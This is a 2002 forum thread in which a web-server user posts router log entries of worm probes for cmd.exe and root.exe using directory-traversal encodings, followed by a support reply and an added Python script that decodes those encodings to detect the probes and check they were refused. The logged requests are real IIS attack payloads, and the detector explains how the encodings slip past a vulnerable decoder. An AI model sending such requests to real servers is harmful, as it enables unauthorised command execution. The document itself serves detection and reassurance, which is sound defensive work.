feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
Posted: Sun Oct 13, 2002 5:28 am Post subject: cgi security
I have noticed some strange requests for unknown executables in odd directories. I was notified by my router (which is also running AWS). The following is a section of the log:
WinRoute - Debug Log
--------------------------------------------------------------------------------
[30/Sep/2002 18:22:21] DNS: query 68.81.145.104:58802 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:25:12] tmp: 68.81.134.193 -> www GET /scripts/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:14] tmp: 68.81.134.193 -> www GET /MSADC/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:15] tmp: 68.81.134.193 -> www GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:16] tmp: 68.81.134.193 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:17] tmp: 68.81.134.193 -> www GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:18] tmp: 68.81.134.193 -> www GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:19] tmp: 68.81.134.193 -> www GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:20] tmp: 68.81.134.193 -> www GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:31] tmp: 68.81.134.193 -> www GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:32] tmp: 68.81.134.193 -> www GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:34] tmp: 68.81.134.193 -> www GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:38] tmp: 68.81.134.193 -> www GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:39] tmp: 68.81.134.193 -> www GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:40] tmp: 68.81.134.193 -> www GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:42] tmp: 68.81.134.193 -> www GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:46] tmp: 68.81.134.193 -> www GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:32:17] DNS: query 68.81.145.104:58806 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:40:05] DNS: query 68.81.145.104:58809 -> 68.80.0.6:53 for mail.bellatlantic.net
[30/Sep/2002 18:42:20] DNS: query 68.81.145.104:58811 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:42:29] tmp: 68.81.4.248 -> www GET /scripts/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:30] tmp: 68.81.4.248 -> www GET /MSADC/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:30] tmp: 68.81.4.248 -> www GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:34] tmp: 68.81.4.248 -> www GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:35] tmp: 68.81.4.248 -> www GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:36] tmp: 68.81.4.248 -> www GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:52:17] DNS: query 68.81.145.104:58815 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:52:18] DNS: query 68.81.145.104:58817 -> 68.80.0.6:53 for mail.comcast.net
--------------------------------------------------------------------------------
Only the tmp (temporary packets) lines are related to the scan. Even though this happened 13 days ago, they always seem to pick up after a few days. I just want to make sure that AWS is not affected whatsoever by this. I am pretty sure that my machine should not be affected by this because I am running AWS on a W98 machine.
J. Patrick -
Joined: 26 Aug 2002 Posts: 42 Location: Pittsburgh, PA USA
Posted: Sun Oct 13, 2002 3:10 pm
I too have noticed the line
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
in my Abyss log, along with a few other strange lines.
feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
Posted: Sun Oct 13, 2002 5:04 pm
It just happened again, right now (12:03 EST). I saved it if anyone wants a look.
aprelium -
Joined: 22 Mar 2002 Posts: 6800
Posted: Mon Oct 14, 2002 8:39 am
Someone tried to attack your computer using a series of malicious HTTP requests. But do not worry, this kind of attack does not affect Abyss Web Server. It is only known to cause trouble on Microsoft IIS/PWS.
The best proof is the access log of AWS. You will find that all these requests were denied (error code 400 or 404).
_________________
Support Team
Aprelium - http://www.aprelium.com
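The request sequence posted in the first message, and the access-log check the support reply suggests, as an added example. This is my own code, not the page's and not part of Abyss Web Server. The probe list in the first post is the one the Nimda worm sent to IIS hosts: root.exe is the copy of cmd.exe that Code Red II left in the scripts and MSADC directories, the %c0%af / %c1%9c / %c1%1c forms are the IIS Unicode directory-traversal encodings, and %255c / %%35%63 are the double-decode forms. The script normalises each requested path the way the vulnerable IIS decoder would, flags anything that resolves to a command shell or climbs above the web root, and then looks the same requests up in an access log to confirm they were refused. The sample log lines are constructed to match the formats on the page; Common Log Format for the access log is an assumption about how the server writes it, and the single 200 line shows what an unpatched IIS would have written, not Abyss.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines in the format of the WinRoute debug log posted above
# (a subset of the probe set plus one benign request), not the full capture.
DEBUG_LOG = """\
[30/Sep/2002 18:22:21] DNS: query 68.81.145.104:58802 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:25:12] tmp: 68.81.134.193 -> www GET /scripts/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:15] tmp: 68.81.134.193 -> www GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:17] tmp: 68.81.134.193 -> www GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:34] tmp: 68.81.134.193 -> www GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:30:00] tmp: 68.81.134.193 -> www GET /index.html HTTP/1.0
"""

# Constructed access-log lines for the same requests. Common Log Format is assumed;
# the 200 on /c/winnt/... is what an unpatched IIS would log, not Abyss.
ACCESS_LOG = """\
68.81.134.193 - - [30/Sep/2002:18:25:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0
68.81.134.193 - - [30/Sep/2002:18:25:15 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 0
68.81.134.193 - - [30/Sep/2002:18:25:17 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
68.81.134.193 - - [30/Sep/2002:18:25:34 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
68.81.134.193 - - [30/Sep/2002:18:30:00 -0400] "GET /index.html HTTP/1.0" 200 512
"""

DEBUG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] tmp: (?P<src>[\d.]+) -> \S+ (?P<method>[A-Z]+) (?P<target>\S+) HTTP/")
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
SUSPECT_FILES = {"cmd.exe", "root.exe"}

def lenient_utf8(raw: bytes) -> str:
    """Decode like the old IIS decoder: a lead byte 0xC0-0xDF takes the next byte as its
    continuation without validating it, so %c0%af -> '/', %c1%9c -> '\\', %c1%1c -> '\\'."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def canonical_path(target: str) -> tuple[str, bool]:
    """Drop the query, percent-decode until stable (covers %255c and %%35%63), apply the
    lenient UTF-8 rules, resolve '..' with '\\' as '/'. Returns (path, escaped_webroot)."""
    path = target.split("?", 1)[0]
    for _ in range(4):  # a few passes cover every double-encoded form on the page
        decoded = lenient_utf8(unquote_to_bytes(path))
        if decoded == path:
            break
        path = decoded
    parts, escaped = [], False
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True  # '..' with nothing left to pop: climbed above the root
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts), escaped

def classify(line: str) -> dict | None:
    """Return a finding for a 'tmp' line that probes for a command shell, else None."""
    m = DEBUG_RE.match(line)
    if not m:
        return None
    path, escaped = canonical_path(m["target"])
    name = path.rsplit("/", 1)[-1].lower()
    reasons = []
    if name in SUSPECT_FILES:
        reasons.append("requests " + name)
    if escaped:
        reasons.append("traverses above web root")
    if not reasons:
        return None
    return {"ts": m["ts"], "src": m["src"], "target": m["target"], "path": path, "reasons": reasons}

def scan_debug_log(text: str) -> list[dict]:
    return [f for f in map(classify, text.splitlines()) if f]

def unrefused(findings: list[dict], access_log: str) -> list[tuple[str, int]]:
    """The check from the support reply: look each probe up in the access log and return
    (target, status) for any the server answered with something other than a 4xx/5xx."""
    status = {}
    for line in access_log.splitlines():
        m = CLF_RE.match(line)
        if m:
            status[(m["src"], m["target"])] = int(m["status"])
    return [(f["target"], status[(f["src"], f["target"])]) for f in findings
            if (f["src"], f["target"]) in status and status[(f["src"], f["target"])] < 400]

if __name__ == "__main__":
    found = scan_debug_log(DEBUG_LOG)
    for f in found:
        print(f["ts"], f["src"], f["path"], "; ".join(f["reasons"]))
    print("served instead of refused:", unrefused(found, ACCESS_LOG))
```

Run as a script it prints one line per probe with the decoded path and the reason it was flagged, then the list of probes the access log shows being served. On a log from a server that rejected every probe, as the support reply describes, that list is empty; the constructed 200 line here is only there to show the check firing.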
feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
Posted: Mon Oct 14, 2002 10:16 pm
Very nice! :D Thank you.
But this can't be used in a DoS attack, can it (because the server still has to formulate the error page)?
aprelium -
Joined: 22 Mar 2002 Posts: 6800
Posted: Tue Oct 15, 2002 1:57 am
feamsr00 wrote:
> Very nice! :D Thank you.
> But this can't be used in a DoS attack, can it (because the server still has to formulate the error page)?

No, this cannot be used in a denial of service attack (DoS). The server is still ready to respond to each request of the attack with an error page.
_________________
Support Team
Aprelium - http://www.aprelium.com